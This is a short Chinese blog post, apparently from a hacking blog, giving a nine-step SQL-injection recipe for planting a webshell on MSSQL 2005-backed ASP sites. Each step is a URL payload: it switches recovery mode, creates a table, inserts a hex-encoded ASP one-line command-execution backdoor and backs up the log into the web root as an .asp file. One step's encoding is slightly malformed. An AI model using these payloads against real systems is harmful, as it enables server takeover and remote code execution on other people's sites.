出自'孤孤浪子博客'原创
http://itpro.blog.163.com
各位拿站的朋友。是不是感觉到现在mssql2000一部分都升级到mssql2005了,目前网络上大多数log备份和差异备份WebShell都针对sql2000的数据库而开发的。那么碰到2005的数据库怎么办呢。不用急,请按照以下方式继续可以拿到webshell。by:孤狐浪子 qq:393214425
第一步
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
第二步:
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
第三步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
第四步
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
第七步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
第九步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}